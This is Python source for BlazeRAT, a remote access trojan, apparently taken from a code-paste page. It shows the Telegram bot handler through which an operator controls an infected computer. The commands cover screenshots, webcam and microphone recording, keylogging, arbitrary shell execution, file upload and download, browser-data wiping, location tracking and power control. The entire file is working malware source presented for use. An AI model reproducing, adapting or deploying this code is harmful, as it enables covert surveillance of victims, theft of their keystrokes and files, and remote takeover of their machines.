123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524 |
- #!/usr/bin/python3
- # -*- coding: utf-8 -*-
- # Import modules
- import telebot # pip3 install pyTelegramBotAPI
- from time import time, ctime, sleep
- # Import helpers
- import core.logger as Logger
- import core.messages as Messages
- import core.database as Database
- import core.banned as BanManager
- from config import token, auth_expire_time
- from core.tokens import VerifyToken, VerifyToken2, EnumeratePermissions
- # Import command modules
- import services.wipe as Wipe
- import services.power as Power
- import services.startup as Autorun
- import services.filemanager as Files
- import services.volume as VolumeLevel
- import services.shell as SystemCommand
- import services.keylogger as Klogger
- import services.keyboard as Keyboard
- import services.transfer as FileTransfer
- import services.location as TrackLocation
- import services.information as SystemInfo
- import services.webcamera as WebcamRecorder
- import services.taskmanager as ProcessManager
- import services.screenshot as DesktopScreenshot
- import services.microphone as MicrophoneRecorder
- """
- Author : LimerBoy
- github.com/LimerBoy/BlazeRAT
- Notes :
- The file is needed to receive commands from the telegram bot
- and process them.
- """
- # Bot
- bot = telebot.TeleBot(token)
- """ Help """
- @bot.message_handler(commands=["help"])
- def Help(message):
- bot.reply_to(message, Messages.user.help, parse_mode="Markdown")
- """ Authorize user """
- @bot.message_handler(commands=["authorize"])
- def Authorize(message):
- token = message.text[11:]
- chatid = message.chat.id
- username = message.chat.username
- username = Messages.user.name_anonymous if username is None else username
- # Prevent authorization if user is banned
- ban_state, reason = BanManager.UserIsBanned(chatid)
- if ban_state is True:
- return bot.send_message(chatid, Messages.auth.user_is_banned % reason)
- # If user is already authorized
- if Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.already_authorized)
- # Check user auth password
- verify_state, name = VerifyToken(token)
- # verify_state, name = VerifyToken2(token)
- if verify_state is True:
- # Log user auth event
- Logger.Log(f"Auth >> Logged in successfully using token {name}", chatid)
- # Delete message with token
- bot.delete_message(chatid, message.message_id)
- # Get session expire time
- expire = ctime(time() + auth_expire_time)
- # Insert user to database
- Database.AuthorizeUser(chatid, name)
- bot.send_message(chatid, Messages.auth.user_authorized % (username, name, expire))
- else:
- attempts = BanManager.GetAttempts(chatid)
- # Ban user
- if attempts == 0:
- Logger.Log(f"Auth >> User banned, reason: 'Token bruteforce'", chatid)
- BanManager.BanUser(chatid, username, True, "Token bruteforce")
- bot.send_message(chatid, Messages.auth.user_is_banned % "Bruteforce")
- else:
- attempts -= 1
- Logger.Log(f"Auth >> Failed log in using token {token}, attempt left {attempts}", chatid)
- BanManager.SetAttempts(chatid, username, attempts)
- bot.send_message(chatid, Messages.auth.incorrect_token % attempts)
- """ Deauthorize user """
- @bot.message_handler(commands=["deauthorize"])
- def Deauthorize(message):
- chatid = message.chat.id
- username = message.chat.username
- username = Messages.user.name_anonymous if username is None else username
- # If user is not authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Deauthorize user
- Logger.Log(f"Auth >> User logged out", chatid)
- Database.DeauthorizeUser(chatid)
- bot.send_message(chatid, Messages.auth.user_deauthorized % username)
- """ Get permissions list """
- @bot.message_handler(commands=["permissions"])
- def Permissions(message):
- chatid = message.chat.id
- # If user is not authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Log
- Logger.Log(f"Command >> Get permissions", chatid)
- # Get perms list
- token = Database.GetUserToken(chatid)
- perms = EnumeratePermissions(token, False, False)
- bot.send_message(chatid, " " + perms)
- """ Get system information """
- @bot.message_handler(commands=["information"])
- def Information(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "INFORMATION"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Log
- Logger.Log(f"Command >> Get system info", chatid)
- # Create microphone controller keyboard
- markup = telebot.types.InlineKeyboardMarkup(row_width=1)
- markup.add(
- telebot.types.InlineKeyboardButton(text="▶️ RAM", callback_data="INFO_RAM"),
- telebot.types.InlineKeyboardButton(text="▶️ Boot", callback_data="INFO_BOOT"),
- telebot.types.InlineKeyboardButton(text="▶️ Disks", callback_data="INFO_DISK"),
- telebot.types.InlineKeyboardButton(text="▶️ System", callback_data="INFO_SYS"),
- telebot.types.InlineKeyboardButton(text="▶️ Processor", callback_data="INFO_CPU"),
- )
- bot.send_message(chatid, "⚙️ System information:", reply_markup=markup)
- """ Send desktop screenshot """
- @bot.message_handler(commands=["screenshot"])
- def Screenshot(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "SCREENSHOT"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Log
- Logger.Log(f"Screenshot >> Get desktop screenshot", chatid)
- # Create desktop screenshot & send to user
- bot.send_chat_action(chatid, "upload_photo")
- screenshot = DesktopScreenshot.Capture()
- bot.send_photo(
- chat_id=chatid, photo=screenshot,
- reply_to_message_id=message.message_id,
- caption=Messages.services.desktop_screenshot_captured
- )
- """ Send webcam video """
- @bot.message_handler(commands=["webcam"])
- def Webcam(message):
- chatid = message.chat.id
- # Get webcam device index
- try:
- device = str(int(message.text[7:]) - 1)
- except:
- device = "0"
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "WEBCAMERA"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Create webcam controller keyboard
- markup = telebot.types.InlineKeyboardMarkup(row_width=1)
- markup.add(
- telebot.types.InlineKeyboardButton(text=Messages.services.webcam_screenshot_button, callback_data="TakeWebcamScreenshot_" + device),
- telebot.types.InlineKeyboardButton(text=Messages.services.webcam_start_recording_button, callback_data="EnableWebcam_" + device),
- telebot.types.InlineKeyboardButton(text=Messages.services.webcam_stop_recording_button, callback_data="DisableWebcam")
- )
- bot.send_message(chatid, Messages.services.webcam_select_action % int(device), reply_markup=markup)
- """ Record audio from microphone """
- @bot.message_handler(commands=["microphone"])
- def Microphone(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "MICROPHONE"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Create microphone controller keyboard
- markup = telebot.types.InlineKeyboardMarkup()
- markup.add(
- telebot.types.InlineKeyboardButton(text=Messages.services.microphone_start_recording_button, callback_data="EnableMicrophone"),
- telebot.types.InlineKeyboardButton(text=Messages.services.microphone_stop_recording_button, callback_data="DisableMicrophone")
- )
- bot.send_message(chatid, Messages.services.microphone_select_action, reply_markup=markup)
- """ Change system audio volume """
- @bot.message_handler(commands=["volume"])
- def Volume(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "VOLUME"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Create volume controller keyboard
- markup = telebot.types.InlineKeyboardMarkup(row_width=1)
- markup.add(telebot.types.InlineKeyboardButton(text=Messages.services.volume_get_level_button % VolumeLevel.Get() + "%", callback_data="VL_GET"))
- # Add set level option from 0 to 100
- for lvl in range(0, 110, 10):
- markup.add(telebot.types.InlineKeyboardButton(text=Messages.services.volume_set_level_button % lvl + "%", callback_data="VL_" + str(lvl)))
- bot.send_message(chatid, " Volume control:", reply_markup=markup)
- """ Keylogger """
- @bot.message_handler(commands=["keylogger"])
- def Keylogger(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "KEYLOGGER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Create keylogger controller keyboard
- markup = telebot.types.InlineKeyboardMarkup()
- markup.add(
- telebot.types.InlineKeyboardButton(text=Messages.services.keylogger_start_recording_button, callback_data="EnableKeylogger"),
- telebot.types.InlineKeyboardButton(text=Messages.services.keylogger_stop_recording_button, callback_data="DisableKeylogger"),
- telebot.types.InlineKeyboardButton(text=Messages.services.keylogger_get_logs_button, callback_data="GetDataKeylogger"),
- telebot.types.InlineKeyboardButton(text=Messages.services.keylogger_clean_logs_button, callback_data="CleanKeylogger")
- )
- bot.send_message(chatid, Messages.services.microphone_select_action, reply_markup=markup)
- """ Send key press """
- @bot.message_handler(commands=["keyboard"])
- def KeyboardCtrl(message):
- text = message.text[10:]
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "KEYBOARD"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Send special keys list
- if not text:
- Keyboard.SendKeyboard(chatid, bot)
- else:
- # Send key press
- Keyboard.SendKeyText(text, chatid)
- """ Power control """
- @bot.message_handler(commands=["power"])
- def PowerCtrl(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "POWER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Create power controller keyboard
- markup = telebot.types.InlineKeyboardMarkup(row_width=1)
- markup.add(
- telebot.types.InlineKeyboardButton(text=Messages.services.power_shutdown, callback_data="POWER_SHUTDOWN"),
- telebot.types.InlineKeyboardButton(text=Messages.services.power_suspend, callback_data="POWER_SUSPEND"),
- telebot.types.InlineKeyboardButton(text=Messages.services.power_reboot, callback_data="POWER_REBOOT"),
- telebot.types.InlineKeyboardButton(text=Messages.services.power_logout, callback_data="POWER_LOGOUT"),
- )
- bot.send_message(chatid, Messages.services.power_control, reply_markup=markup)
- """ Get location by BSSID """
- @bot.message_handler(commands=["location"])
- def Location(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "LOCATION"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Try to get device location
- TrackLocation.SendLocation(message, bot)
- """ Files control """
- @bot.message_handler(commands=["filemanager"])
- def Filemanager(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "FILEMANAGER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Control files
- Files.Filemanager(chatid, bot)
- """ Task manager """
- @bot.message_handler(commands=["taskmanager"])
- def TaskManager(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "TASKMANAGER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Send process controls
- ProcessManager.ShowProcesses(message, bot)
- """ Download files or directories to telegram bot """
- @bot.message_handler(commands=["download"])
- def DownloadFile(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "FILETRANSFER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Send file to telegram bot
- bot.send_chat_action(chatid, "upload_document")
- FileTransfer.SendFile(message, bot)
- """ Upload files to device """
- @bot.message_handler(content_types=["document"])
- def UploadFile(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "FILETRANSFER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Save file on device
- bot.send_chat_action(chatid, "upload_document")
- FileTransfer.ReceiveFile(message, bot)
- """ Wipe browsers data """
- @bot.message_handler(commands=["wipe"])
- def WipeBrowserData(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "WIPE"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Execute wipe command
- Wipe.WipeBrowserDataInfo(message, bot)
- """ Uninstall agent """
- @bot.message_handler(commands=["uninstall"])
- def Uninstall(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "UNINSTALL"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Log
- Logger.Log(f"Command >> Uninstall service", chatid)
- # Execute commands
- bot.send_message(chatid, Messages.services.stub_uninstall)
- Autorun.ServiceUninstall()
- """ Toggle command shell session for chatid """
- @bot.message_handler(commands=["shell"])
- def ToggleShell(message):
- chatid = message.chat.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "SHELL"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Send shell session state
- bot.send_chat_action(chatid, "typing")
- state = SystemCommand.ToggleSession(chatid)
- bot.reply_to(message, state)
- """ Execute shell commands """
- @bot.message_handler(func=lambda message: True, content_types=["text"])
- def ExecuteShell(message):
- chatid = message.chat.id
- command = message.text
- # Check if session exists
- if not SystemCommand.SessionExists(chatid):
- return
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "SHELL"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Run commands
- bot.send_chat_action(chatid, "typing")
- output = SystemCommand.Run(command, chatid)
- if output != None:
- bot.reply_to(message, output)
- """ Events handler """
- @bot.callback_query_handler(func=lambda c:True)
- def KeyboardActions(callback):
- text = callback.data
- chatid = callback.from_user.id
- # Check if user authorized
- if not Database.UserIsAuthorized(chatid):
- return bot.send_message(chatid, Messages.auth.not_authorized)
- # Microphone controls
- if "Microphone" in text:
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "MICROPHONE"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Handle microphone command
- MicrophoneRecorder.Handle(callback, bot)
- # Webcam controls
- elif "Webcam" in text:
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "WEBCAMERA"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Handle webcam command
- WebcamRecorder.Handle(callback, bot)
- # Keylogger controls
- elif "Keylogger" in text:
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "KEYLOGGER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Handle keylogger command
- Klogger.Handle2(callback, bot)
- # Filemanager controls
- elif text[:2] in ("FA", "FC"):
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "FILEMANAGER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Handle filemanager command
- if text[:2] == "FA":
- Files.OpenFileActionsMenu(callback, bot)
- elif text[:2] == "FC":
- Files.MakeFileAction(callback, bot)
- # System info
- elif text[:4] == "INFO":
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "INFORMATION"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Handle system info command
- SystemInfo.Handle(callback, bot)
- # Process manager
- elif text[:2] == "TM":
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "TASKMANAGER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Handle taskmanager command
- ProcessManager.KillProcess(callback, bot)
- # Volume control
- elif text[:2] == "VL":
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "VOLUME"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Get level
- if "GET" in text:
- return bot.send_message(chatid, Messages.services.volume_get_level % VolumeLevel.Get() + "%")
- else:
- # Set level
- level = int(text.split("_")[-1])
- VolumeLevel.SetVolume(level)
- return bot.send_message(chatid, Messages.services.volume_set_level % level + "%")
- # Power control
- elif text[:5] == "POWER":
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "POWER"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Handle taskmanager command
- Power.Handle(callback, bot)
- # Keyboard special keys
- elif text[:6] == "SNDKEY":
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "KEYBOARD"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- Keyboard.SendKeyPress(text.split("_")[-1], chatid)
- # Wipe browsers data
- elif text[:4] == "Wipe":
- # Check if token have permissions to do this
- if not Database.UserContainsPermission(chatid, "WIPE"):
- return bot.send_message(chatid, Messages.auth.permission_not_found)
- # Log
- Logger.Log(f"Command >> Wipe browsers data", chatid)
- # Wipe
- Wipe.WipeBrowserData(callback, bot)
- """ Run telegram bot """
- def Run():
- print("[~] Telegram Bot starting...")
- try:
- print("[?] Started as @" + bot.get_me().username)
- except Exception as error:
- exit(f"[!] Failed connect to telegram bot\n{error}")
- else:
- while True:
- try:
- bot.polling(none_stop=True)
- except Exception as error:
- print(error)
- sleep(2)